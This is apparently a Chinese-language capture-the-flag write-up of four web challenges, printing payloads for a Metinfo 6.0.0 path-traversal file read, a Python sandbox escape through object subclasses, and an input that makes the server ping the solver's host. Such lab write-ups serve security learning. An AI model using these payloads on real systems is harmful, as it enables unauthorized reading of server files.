DC0531 CTF 线上赛 #### Web1 先关注公众号然后发现是个游戏。 测试发现`s:ip`这样会向我们的vps发送ping请求 通过ping请求得到服务器ip,扫描得知存在git泄露  通过分析可知,将武器切换为flag即可  然后一直s我们的vps   得到base64加密的flag.php文件 `PD9WaHAKJGZsYWcgPSAiREMwNTMxe1dlY2hBdF9Jc19Tb19DMG9sfSI7Cg` 解密即可 #### Web2 题目存在git泄露 `http://badcode.cc/2018/05/26/Metinfo-6-0-0-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/` 根据网上纰漏的文件读取,然后进行bypass得到flag `/include/thumb.php?dir=.....///./http/.....///./.....///./.....///./.....///./flag`  #### Web3 首先输入 `().__class__.__base__.__subclasses__()`不可用 `0x1.__class__.__base__.__subclasses__()`发现可用  `0x1.__class__.__base__.__subclasses__()[40]("/home/ctf/flag")` 可以读到文件流 但是不能直接 read,通过 for 循环将文件内容读取出来,这里注意不允许有空格 `[i.read()for(i)in[0x1.__class__.__base__.__subclasses__()[40]("/home/ctf/flag")]]`  #### Web4 原题 https://github.com/wonderkun/CTF_web/tree/dcf36cb9ba9a580a4e8d92b43480b6575fed2c3a/web200-7